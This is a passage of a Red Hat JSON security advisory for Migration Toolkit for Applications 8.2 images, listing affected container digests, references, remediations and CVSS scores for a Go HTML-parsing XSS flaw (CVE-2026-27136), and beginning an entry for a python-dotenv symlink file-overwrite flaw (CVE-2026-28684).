"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27136"
},
{
"category": "external",
"summary": "RHBZ#2480757",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2480757"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27136",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27136"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27136",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27136"
},
{
"category": "external",
"summary": "https://go.dev/cl/781685",
"url": "https://go.dev/cl/781685"
},
{
"category": "external",
"summary": "https://go.dev/issue/79575",
"url": "https://go.dev/issue/79575"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8",
"url": "https://groups.google.com/g/golang-announce/c/iI-mYSI0lu8"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-5030",
"url": "https://pkg.go.dev/vuln/GO-2026-5030"
}
],
"release_date": "2026-05-22T15:01:22.111000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang.org/x/net/html: golang: golang.org/x/net/html: Cross-Site Scripting via HTML parsing bypass"
},
{
"cve": "CVE-2026-28684",
"cwe": {
"id": "CWE-59",
"name": "Improper Link Resolution Before File Access (\u0027Link Following\u0027)"
},
"discovery_date": "2026-04-20T17:02:18.205732+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2459798"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in python-dotenv. A local attacker can exploit this by crafting a symbolic link, which the `set_key()` and `unset_key()` functions in python-dotenv follow when rewriting `.env` files. This can lead to the overwriting of arbitrary files on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-dotenv: python-dotenv: Arbitrary file overwrite via symbolic link following",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28684"
},
{
"category": "external",
"summary": "RHBZ#2459798",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2459798"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28684",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28684"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28684",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28684"
},
{
"category": "external",
"summary": "https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311",
"url": "https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311"
},
{
"category": "external",
"summary": "https://github.com/theskumar/python-dotenv/releases/tag/v1.2.2",
